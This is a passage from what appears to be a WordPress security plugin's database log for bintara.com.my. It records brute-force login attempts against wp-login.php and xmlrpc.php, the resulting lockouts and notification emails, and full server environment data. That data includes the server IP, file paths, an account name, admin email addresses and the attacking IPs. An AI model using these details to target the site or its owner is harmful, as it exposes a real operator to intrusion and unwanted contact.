ERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYKa3kXpgmG5P@iB8kX9gAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065579.7881\";s:12:\"REQUEST_TIME\";s:10:\"1569065579\";}}','notice','2019-09-21 11:33:01','2019-09-21 11:33:00',17800048,19290072,'https://bintara.com.my/wp/wp-login.php',1,0,'158.69.27.201'),(25469,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYD@3kXpgmG5P@iB8kRgwAAAIQ\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.70.191\";s:11:\"REMOTE_PORT\";s:5:\"41290\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYD@3kXpgmG5P@iB8kRgwAAAIQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063931.1445\";s:12:\"REQUEST_TIME\";s:10:\"1569063931\";}}','notice','2019-09-21 11:05:33','2019-09-21 11:05:31',18315584,19614512,'https://bintara.com.my/blog/xmlrpc.php',1,0,'167.99.70.191'),(25467,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:05:29','2019-09-21 11:05:28',18088640,19288696,'https://bintara.com.my/blog/wp-login.php',1,0,'167.99.70.191'),(25468,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYD9rfBTP0kPOVnb8jpoQAAAEM\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"166.62.84.17\";s:11:\"REMOTE_PORT\";s:5:\"59212\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYD9rfBTP0kPOVnb8jpoQAAAEM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063928.6847\";s:12:\"REQUEST_TIME\";s:10:\"1569063928\";}}','notice','2019-09-21 11:05:29','2019-09-21 11:05:29',18315736,19612944,'https://bintara.com.my/test/xmlrpc.php',1,0,'166.62.84.17'),(25466,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:05:28\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:05:28\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:20:28\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:20:28\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:05:29','2019-09-21 11:05:28',17882936,19288696,'https://bintara.com.my/blog/wp-login.php',1,0,'167.99.70.191'),(25463,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:05:04\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:05:04\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:20:04\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:20:04\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:05:06','2019-09-21 11:05:04',17881376,19287760,'https://bintara.com.my/test/wp-login.php',1,0,'166.62.84.17'),(25464,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:05:06','2019-09-21 11:05:04',18087256,19287760,'https://bintara.com.my/test/wp-login.php',1,0,'166.62.84.17'),(25465,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYD8TDrcQxTmGrCWuaJsAAAAdA\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.70.191\";s:11:\"REMOTE_PORT\";s:5:\"39612\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYD8TDrcQxTmGrCWuaJsAAAAdA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063924.8399\";s:12:\"REQUEST_TIME\";s:10:\"1569063924\";}}','notice','2019-09-21 11:05:29','2019-09-21 11:05:28',17798032,19288696,'https://bintara.com.my/blog/wp-login.php',1,0,'167.99.70.191'),(25462,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYD3zDrcQxTmGrCWuaJrAAAAdU\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"166.62.84.17\";s:11:\"REMOTE_PORT\";s:5:\"55092\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYD3zDrcQxTmGrCWuaJrAAAAdU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063903.8712\";s:12:\"REQUEST_TIME\";s:10:\"1569063903\";}}','notice','2019-09-21 11:05:05','2019-09-21 11:05:04',17796904,19287760,'https://bintara.com.my/test/wp-login.php',1,0,'166.62.84.17'),(25459,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:04:55\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:04:55\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:19:55\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:19:55\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:04:57','2019-09-21 11:04:55',17882864,19288696,'https://bintara.com.my/2019/wp-login.php',1,0,'192.169.139.6'),(25460,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:04:57','2019-09-21 11:04:55',18088432,19288696,'https://bintara.com.my/2019/wp-login.php',1,0,'192.169.139.6'),(25461,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/2019/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYD2jDrcQxTmGrCWuaJqwAAAdM\";s:12:\"REDIRECT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"192.169.139.6\";s:11:\"REMOTE_PORT\";s:5:\"50672\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYD2jDrcQxTmGrCWuaJqwAAAdM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063898.9748\";s:12:\"REQUEST_TIME\";s:10:\"1569063898\";}}','notice','2019-09-21 11:05:02','2019-09-21 11:05:00',18315584,19614512,'https://bintara.com.my/2019/xmlrpc.php',1,0,'192.169.139.6'),(25458,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYD1HkXpgmG5P@iB8kRVwAAAJQ\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"192.169.139.6\";s:11:\"REMOTE_PORT\";s:5:\"49468\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYD1HkXpgmG5P@iB8kRVwAAAJQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063895.6139\";s:12:\"REQUEST_TIME\";s:10:\"1569063895\";}}','notice','2019-09-21 11:04:57','2019-09-21 11:04:55',17797992,19288696,'https://bintara.com.my/2019/wp-login.php',1,0,'192.169.139.6'),(25457,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 